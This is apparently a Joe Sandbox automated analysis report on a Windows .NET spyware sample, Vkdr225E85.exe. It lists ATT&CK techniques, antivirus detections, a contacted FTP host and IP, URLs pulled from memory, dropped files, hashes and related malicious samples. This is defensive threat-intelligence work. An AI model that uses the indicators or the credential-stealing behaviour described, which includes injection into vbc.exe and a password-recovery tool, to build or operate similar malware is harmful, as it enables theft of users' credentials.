              Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingApplication Window Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
              Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureSystem Owner/User Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
              Compromise Software Supply ChainUnix ShellLaunchdLaunchdRename System UtilitiesKeyloggingRemote System Discovery1Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Vkdr225E85.exe32%MetadefenderBrowse
              Vkdr225E85.exe68%ReversingLabsByteCode-MSIL.Spyware.Noon
              Vkdr225E85.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              7.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1125438Download File
              1.2.Vkdr225E85.exe.43cc7f0.2.unpack100%AviraTR/Inject.vcoldiDownload File
              4.2.Vkdr225E85.exe.400000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
              4.2.Vkdr225E85.exe.400000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
              http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
              http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
              https://adservice.google.0%Avira URL Cloudsafe
              http://www.tiro.com0%URL Reputationsafe
              http://www.tiro.com0%URL Reputationsafe
              http://www.tiro.com0%URL Reputationsafe
              http://www.goodfont.co.kr0%URL Reputationsafe
              http://www.goodfont.co.kr0%URL Reputationsafe
              http://www.goodfont.co.kr0%URL Reputationsafe
              http://www.gagalive.kr/livechat1.swf?chatroom=inchat-0%Avira URL Cloudsafe
              http://www.carterandcone.coml0%URL Reputationsafe
              http://www.carterandcone.coml0%URL Reputationsafe
              http://www.carterandcone.coml0%URL Reputationsafe
              http://www.sajatypeworks.com0%URL Reputationsafe
              http://www.sajatypeworks.com0%URL Reputationsafe
              http://www.sajatypeworks.com0%URL Reputationsafe
              http://www.typography.netD0%URL Reputationsafe
              http://www.typography.netD0%URL Reputationsafe
              http://www.typography.netD0%URL Reputationsafe
              http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
              http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
              http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
              http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
              http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
              http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
              http://fontfabrik.com0%URL Reputationsafe
              http://fontfabrik.com0%URL Reputationsafe
              http://fontfabrik.com0%URL Reputationsafe
              http://www.founder.com.cn/cn0%URL Reputationsafe
              http://www.founder.com.cn/cn0%URL Reputationsafe
              http://www.founder.com.cn/cn0%URL Reputationsafe
              http://ftp.triplelink.co.th0%Avira URL Cloudsafe
              http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
              http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
              http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
              http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
              http://www.sandoll.co.kr0%URL Reputationsafe
              http://www.sandoll.co.kr0%URL Reputationsafe
              http://www.sandoll.co.kr0%URL Reputationsafe
              http://www.urwpp.deDPlease0%URL Reputationsafe
              http://www.urwpp.deDPlease0%URL Reputationsafe
              http://www.urwpp.deDPlease0%URL Reputationsafe
              http://www.zhongyicts.com.cn0%URL Reputationsafe
              http://www.zhongyicts.com.cn0%URL Reputationsafe
              http://www.zhongyicts.com.cn0%URL Reputationsafe
              http://www.sakkal.com0%URL Reputationsafe
              http://www.sakkal.com0%URL Reputationsafe
              http://www.sakkal.com0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              ftp.triplelink.co.th
              103.27.200.199
              truetrue
                unknown
                200.82.6.0.in-addr.arpa
                unknown
                unknownfalse
                  unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.apache.org/licenses/LICENSE-2.0Vkdr225E85.exe, 00000001.00000002.263249661.0000000006020000.00000002.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpfalse
                    high
                    http://www.fontbureau.comVkdr225E85.exe, 00000001.00000002.263249661.0000000006020000.00000002.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpfalse
                      high
                      http://www.fontbureau.com/designersGVkdr225E85.exe, 00000001.00000002.263249661.0000000006020000.00000002.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpfalse
                        high
                        http://www.fontbureau.com/designers/?Vkdr225E85.exe, 00000001.00000002.263249661.0000000006020000.00000002.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpfalse
                          high
                          http://inchat.kro.krVkdr225E85.exefalse
                            high
                            http://www.founder.com.cn/cn/bTheVkdr225E85.exe, 00000001.00000002.263249661.0000000006020000.00000002.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designers?Vkdr225E85.exe, 00000001.00000002.263249661.0000000006020000.00000002.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpfalse
                              high
                              https://adservice.google.vbc.exe, 00000007.00000003.281794545.0000000000C5D000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.tiro.comVkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.fontbureau.com/designersVkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpfalse
                                high
                                http://www.goodfont.co.krVkdr225E85.exe, 00000001.00000002.263249661.0000000006020000.00000002.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.gagalive.kr/livechat1.swf?chatroom=inchat-Vkdr225E85.exefalse
                                • Avira URL Cloud: safe
                                unknown
                                https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssVkdr225E85.exe, 00000001.00000002.257214387.0000000002F81000.00000004.00000001.sdmpfalse
                                  high
                                  https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=5657692vbc.exe, 00000007.00000003.281794545.0000000000C5D000.00000004.00000001.sdmpfalse
                                    high
                                    http://www.carterandcone.comlVkdr225E85.exe, 00000001.00000002.263249661.0000000006020000.00000002.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.sajatypeworks.comVkdr225E85.exe, 00000001.00000002.263249661.0000000006020000.00000002.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.typography.netDVkdr225E85.exe, 00000001.00000002.263249661.0000000006020000.00000002.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.fontbureau.com/designers/cabarga.htmlNVkdr225E85.exe, 00000001.00000002.263249661.0000000006020000.00000002.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpfalse
                                      high
                                      http://www.founder.com.cn/cn/cTheVkdr225E85.exe, 00000001.00000002.263249661.0000000006020000.00000002.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.galapagosdesign.com/staff/dennis.htmVkdr225E85.exe, 00000001.00000002.263249661.0000000006020000.00000002.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://fontfabrik.comVkdr225E85.exe, 00000001.00000002.263249661.0000000006020000.00000002.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.founder.com.cn/cnVkdr225E85.exe, 00000001.00000002.263249661.0000000006020000.00000002.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.com/designers/frere-jones.htmlVkdr225E85.exe, 00000001.00000002.263249661.0000000006020000.00000002.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpfalse
                                        high
                                        https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96evbc.exe, 00000007.00000002.282758861.0000000000858000.00000004.00000020.sdmpfalse
                                          high
                                          https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=7162084889081;gvbc.exe, 00000007.00000003.281794545.0000000000C5D000.00000004.00000001.sdmpfalse
                                            high
                                            https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=71620848vvbc.exe, 00000007.00000002.282758861.0000000000858000.00000004.00000020.sdmpfalse
                                              high
                                              https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2vbc.exe, 00000007.00000002.282758861.0000000000858000.00000004.00000020.sdmpfalse
                                                high
                                                http://ftp.triplelink.co.thVkdr225E85.exe, 00000004.00000002.509801613.0000000003563000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.jiyu-kobo.co.jp/Vkdr225E85.exe, 00000001.00000002.263249661.0000000006020000.00000002.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://whatismyipaddress.com/-Vkdr225E85.exe, 00000001.00000002.258840939.0000000003F89000.00000004.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.502038195.0000000000402000.00000040.00000001.sdmpfalse
                                                  high
                                                  http://www.galapagosdesign.com/DPleaseVkdr225E85.exe, 00000001.00000002.263249661.0000000006020000.00000002.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.fontbureau.com/designers8Vkdr225E85.exe, 00000001.00000002.263249661.0000000006020000.00000002.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpfalse
                                                    high
                                                    https://login.yahoo.com/config/loginvbc.exefalse
                                                      high
                                                      http://www.fonts.comVkdr225E85.exe, 00000001.00000002.263249661.0000000006020000.00000002.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpfalse
                                                        high
                                                        http://www.sandoll.co.krVkdr225E85.exe, 00000001.00000002.263249661.0000000006020000.00000002.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.site.com/logs.phpVkdr225E85.exe, 00000004.00000002.506439148.0000000003061000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://www.urwpp.deDPleaseVkdr225E85.exe, 00000001.00000002.263249661.0000000006020000.00000002.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.nirsoft.net/vbc.exe, vbc.exe, 00000007.00000002.282385616.0000000000400000.00000040.00000001.sdmpfalse
                                                            high
                                                            http://www.zhongyicts.com.cnVkdr225E85.exe, 00000001.00000002.263249661.0000000006020000.00000002.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameVkdr225E85.exe, 00000001.00000002.257214387.0000000002F81000.00000004.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.506439148.0000000003061000.00000004.00000001.sdmpfalse
                                                              high
                                                              http://www.sakkal.comVkdr225E85.exe, 00000001.00000002.263249661.0000000006020000.00000002.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://schooldb.inchat.kro.kr/Vkdr225E85.exefalse
                                                                high

                                                                Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                103.27.200.199
                                                                unknownThailand
                                                                58955BANGMODENTERPRISE-THBangmodEnterpriseCoLtdTHtrue

                                                                Private

                                                                IP
                                                                192.168.2.1

                                                                General Information

                                                                Joe Sandbox Version:31.0.0 Emerald
                                                                Analysis ID:359443
                                                                Start date:28.02.2021
                                                                Start time:10:04:21
                                                                Joe Sandbox Product:CloudBasic
                                                                Overall analysis duration:0h 11m 16s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:light
                                                                Sample file name:Vkdr225E85 (renamed file extension from none to exe)
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                Number of analysed new started processes analysed:30
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • HDC enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Detection:MAL
                                                                Classification:mal100.phis.troj.spyw.evad.winEXE@7/4@2/2
                                                                EGA Information:Failed
                                                                HDC Information:
                                                                • Successful, ratio: 4.1% (good quality ratio 4%)
                                                                • Quality average: 85.6%
                                                                • Quality standard deviation: 23.2%
                                                                HCA Information:
                                                                • Successful, ratio: 98%
                                                                • Number of executed functions: 0
                                                                • Number of non-executed functions: 0
                                                                Cookbook Comments:
                                                                • Adjust boot time
                                                                • Enable AMSI
                                                                Warnings:
                                                                Show All
                                                                • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                • Excluded IPs from analysis (whitelisted): 52.255.188.83, 92.122.145.220, 104.43.193.48, 13.64.90.137, 184.30.24.56, 51.104.139.180, 2.20.142.210, 2.20.142.209, 93.184.221.240, 51.103.5.186, 51.11.168.160, 92.122.213.247, 92.122.213.194, 52.155.217.156, 20.54.26.129
                                                                • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, vip2-par02p.wns.notify.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • VT rate limit hit for: /opt/package/joesandbox/database/analysis/359443/sample/Vkdr225E85.exe

                                                                Simulations

                                                                Behavior and APIs

                                                                TimeTypeDescription
                                                                10:05:46API Interceptor6x Sleep call for process: Vkdr225E85.exe modified

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                103.27.200.199071020207659825.PDF.exeGet hashmaliciousBrowse
                                                                  file.exeGet hashmaliciousBrowse
                                                                    103002994-05102020.PDF.exeGet hashmaliciousBrowse
                                                                      1110975-0080620.PDF.exeGet hashmaliciousBrowse
                                                                        l0185766832020805.PDF.exeGet hashmaliciousBrowse
                                                                          008042020786544141.PDF.exeGet hashmaliciousBrowse
                                                                            dHXjzn9Z5w.exeGet hashmaliciousBrowse
                                                                              O7292020987725545.PDF.exeGet hashmaliciousBrowse
                                                                                98764737722.PDF.exeGet hashmaliciousBrowse
                                                                                  gunzipped.exeGet hashmaliciousBrowse

                                                                                    Domains

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                    ftp.triplelink.co.th071020207659825.PDF.exeGet hashmaliciousBrowse
                                                                                    • 103.27.200.199
                                                                                    file.exeGet hashmaliciousBrowse
                                                                                    • 103.27.200.199
                                                                                    103002994-05102020.PDF.exeGet hashmaliciousBrowse
                                                                                    • 103.27.200.199
                                                                                    1110975-0080620.PDF.exeGet hashmaliciousBrowse
                                                                                    • 103.27.200.199
                                                                                    l0185766832020805.PDF.exeGet hashmaliciousBrowse
                                                                                    • 103.27.200.199
                                                                                    008042020786544141.PDF.exeGet hashmaliciousBrowse
                                                                                    • 103.27.200.199
                                                                                    dHXjzn9Z5w.exeGet hashmaliciousBrowse
                                                                                    • 103.27.200.199
                                                                                    O7292020987725545.PDF.exeGet hashmaliciousBrowse
                                                                                    • 103.27.200.199
                                                                                    98764737722.PDF.exeGet hashmaliciousBrowse
                                                                                    • 103.27.200.199
                                                                                    gunzipped.exeGet hashmaliciousBrowse
                                                                                    • 103.27.200.199

                                                                                    ASN

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                    BANGMODENTERPRISE-THBangmodEnterpriseCoLtdTHWfSx9pJXxf.exeGet hashmaliciousBrowse
                                                                                    • 103.86.49.11
                                                                                    l9ZtB4c9Gj.exeGet hashmaliciousBrowse
                                                                                    • 103.86.49.11
                                                                                    New Purchase Order 501,689$.exeGet hashmaliciousBrowse
                                                                                    • 45.64.187.182
                                                                                    071020207659825.PDF.exeGet hashmaliciousBrowse
                                                                                    • 103.27.200.199
                                                                                    file.exeGet hashmaliciousBrowse
                                                                                    • 103.27.200.199
                                                                                    103002994-05102020.PDF.exeGet hashmaliciousBrowse
                                                                                    • 103.27.200.199
                                                                                    BAL_0MX2NTOGM6VL9.docGet hashmaliciousBrowse
                                                                                    • 45.64.185.141
                                                                                    1110975-0080620.PDF.exeGet hashmaliciousBrowse
                                                                                    • 103.27.200.199
                                                                                    l0185766832020805.PDF.exeGet hashmaliciousBrowse
                                                                                    • 103.27.200.199
                                                                                    008042020786544141.PDF.exeGet hashmaliciousBrowse
                                                                                    • 103.27.200.199
                                                                                    dHXjzn9Z5w.exeGet hashmaliciousBrowse
                                                                                    • 103.27.200.199
                                                                                    O7292020987725545.PDF.exeGet hashmaliciousBrowse
                                                                                    • 103.27.200.199
                                                                                    98764737722.PDF.exeGet hashmaliciousBrowse
                                                                                    • 103.27.200.199
                                                                                    gunzipped.exeGet hashmaliciousBrowse
                                                                                    • 103.27.200.199
                                                                                    Christmas Greeting eCard.docGet hashmaliciousBrowse
                                                                                    • 103.27.201.8
                                                                                    Christmas Greeting eCard.docGet hashmaliciousBrowse
                                                                                    • 103.27.201.8
                                                                                    Christmas Greeting eCard.docGet hashmaliciousBrowse
                                                                                    • 103.27.201.8
                                                                                    http://www.ragamjayakonveksi.com/LVOI-ciiP2TrcvEri2zr_NkaRtevhO-LxGet hashmaliciousBrowse
                                                                                    • 103.27.201.8
                                                                                    system.ps1Get hashmaliciousBrowse
                                                                                    • 103.27.200.95

                                                                                    JA3 Fingerprints

                                                                                    No context

                                                                                    Dropped Files

                                                                                    No context

                                                                                    Created / dropped Files

                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Vkdr225E85.exe.log
                                                                                    Process:C:\Users\user\Desktop\Vkdr225E85.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):1314
                                                                                    Entropy (8bit):5.350128552078965
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                                                    MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                                                    SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                                                    SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                                                    SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                                                    Malicious:true
                                                                                    Reputation:high, very likely benign file
                                                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                                                    C:\Users\user\AppData\Local\Temp\holderwb.txt
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                    File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):2
                                                                                    Entropy (8bit):1.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Qn:Qn
                                                                                    MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                    Malicious:false
                                                                                    Reputation:high, very likely benign file
                                                                                    Preview: ..
                                                                                    C:\Users\user\AppData\Roaming\pid.txt
                                                                                    Process:C:\Users\user\Desktop\Vkdr225E85.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):4
                                                                                    Entropy (8bit):2.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:LX:j
                                                                                    MD5:5726DAF2C9EE0F955ECA58291C26D2F3
                                                                                    SHA1:C771A01B2F51BF310EAA80F1FF786832EE89C293
                                                                                    SHA-256:815573775E968B26DBC289D9CEE3FAA6FFD200DD7AC7DB90A023E5134B55E1EE
                                                                                    SHA-512:23448B59CC26A66C769E2764E3C3E425213499EA0B6D7BF9378F2E3BC46AB228B619F75664128EF8ACFA4AC5774B4E729A02FF24C5F0C99C907C6F9E9E0D59A8
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview: 6712
                                                                                    C:\Users\user\AppData\Roaming\pidloc.txt
                                                                                    Process:C:\Users\user\Desktop\Vkdr225E85.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):41
                                                                                    Entropy (8bit):4.208297968550675
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:oN0naRRzYHuAdA:oNcSR8A
                                                                                    MD5:71C16A7891B44C92F849944E727A6210
                                                                                    SHA1:05876E25501B87BEC07BB22CE58971F0A5F6BFBC
                                                                                    SHA-256:2D264DA1BBA7BF4A973AE8BA6AF8F9DC33CB4ACE8895A89560223A259C4DD090
                                                                                    SHA-512:5EF70C78A942A9BE54027971D3D613FA3298426EA4ACA0D7C77E847BC5A00C0D6471FCFA3631A5FFC9A9F8D70C1F1127CB1AAE7E045E9C4D9B9800B2EF4A78D1
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview: C:\Users\user\Desktop\Vkdr225E85.exe

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Entropy (8bit):7.804031070708093
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                    File name:Vkdr225E85.exe
                                                                                    File size:811520
                                                                                    MD5:ff932f457521b993feffc92d662166e6
                                                                                    SHA1:725cc0c5e1914d3ea02674fa7278ed8b7c4f8b19
                                                                                    SHA256:ac8dde58d7ead58fa4b474c6627621489fdf362270147bb0e00c1a8678ba3888
                                                                                    SHA512:dfeb88d7ef0308ffe691e3d05270613ebd237cbfd7e7eb7f1093278460187075768e6582e1dae1541c39e0459fb3b54aed7a7c327555e90fd50058d039047b56
                                                                                    SSDEEP:12288:4R/ZZvkGFYZx4kCyWu9XsV9+HAl7EknXo7p3VE0Xx8FlN:aZmZGuNsV9+gOkYvE0h8LN
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5.6`..............P..X...........v... ........@.. ....................................@................................

                                                                                    File Icon

